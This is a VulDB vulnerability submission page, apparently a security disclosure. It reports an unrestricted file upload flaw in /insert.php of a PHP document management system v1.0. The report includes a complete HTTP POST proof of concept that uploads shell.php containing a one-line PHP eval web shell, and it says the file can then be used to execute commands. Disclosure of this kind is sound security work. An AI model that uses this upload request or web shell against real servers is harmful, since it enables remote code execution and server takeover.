提出 #621411: code-projects document-management-system-in-php-with-source-code v1.0 Unrestricted Upload情報

タイトル	code-projects document-management-system-in-php-with-source-code v1.0 Unrestricted Upload
説明	# Document Management System In PHP With Source Code v1.0 /insert.php Unrestricted Upload ## Vendor Homepage https://code-projects.org/ ## submitter mawenjie ## Vulnerable File - /insert.php ## VERSION(S) - V1.0 ## Software Link - https://code-projects.org/document-management-system-in-php-with-source-code/ ## Vulnerability Type - Unrestricted Upload ## Root Cause Document Management System In PHP With Source Code v1.0 /insert.php,After logging in, uploading files when adding content to the page without any restrictions or filtering leads to an unlimited upload vulnerability. #### The source code is not filtered. <img width="787" height="395" alt="Image" src="https://github.com/user-attachments/assets/b0344071-d4e4-4d3d-b967-798abafbf58d" /> ## Impact File upload vulnerabilities are extremely harmful. Attackers can upload malicious scripts (such as WebShell) to directly control the server, view, tamper with or delete files, execute system commands, and even create administrator accounts. The server may become a "zombie" and be used for DDoS attacks, sending spam, etc. At the same time, the database is vulnerable to intrusion, sensitive information such as user privacy and commercial secrets may be stolen or tampered with, and website pages may be maliciously replaced, damaging the platform's reputation. In addition, the vulnerability may also become a springboard for attacking other systems, triggering chain security issues and posing multi-dimensional threats to servers, data and users. # DESCRIPTION PHP document management system, source code v1.0. After logging in, upload files when adding content to the page,In the page index.php, the upload function in the /insert.php file was referenced, triggering an unlimited upload vulnerability. There are no restrictions or filters. Remote attackers can pass malicious loads through this file upload function, causing file uploads to be unrestricted and further leading to remote code execution (RCE). # 漏洞详细信息和 POC ## Payload ```makefile POST /insert.php HTTP/1.1 Host: 192.168.126.133:8088 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=----geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Length: 1608 Origin: http://192.168.126.133:8088 Connection: keep-alive Referer: http://192.168.126.133:8088/index.php Cookie: PHPSESSID=f3p49bjml603prg0rrp6drf5d5 Upgrade-Insecure-Requests: 1 Priority: u=0, i ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field1" 5201- ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="anothercont" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="yr" ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field2" external ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field3" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="uploaded_file"; filename="shell.php" Content-Type: application/octet-stream <?php @eval($_POST['shell']);?> ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field4" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field5" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field6" domesca ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="newco" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field7" henry ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="anotheremp" 1 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8 Content-Disposition: form-data; name="field8" 2025-07-23 ------geckoformboundaryf7d925af84c10605c54c8ae5a584f3a8-- ``` <img width="811" height="424" alt="Image" src="https://github.com/user-attachments/assets/8aff60bd-b8cf-43d3-a8bf-608b8d968d6d" /> #### According to burp Data packet analysis Obtain the file path And access the execution command <img width="583" height="377" alt="Image" src="https://github.com/user-attachments/assets/12fcd569-82a4-4fc9-b1f0-2c536dcf1e98" />
ソース	⚠️ https://github.com/XiaoJiesecqwq/CVE/issues/4
ユーザー	Anonymous User
送信	2025年07月23日 12:09 (9 月 ago)
モデレーション	2025年07月25日 09:38 (2 days later)
ステータス	承諾済み
VulDBエントリ	317585 [code-projects Document Management System 1.0 /insert.php uploaded_file 特権昇格]
ポイント	20

◂ 前概要次 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!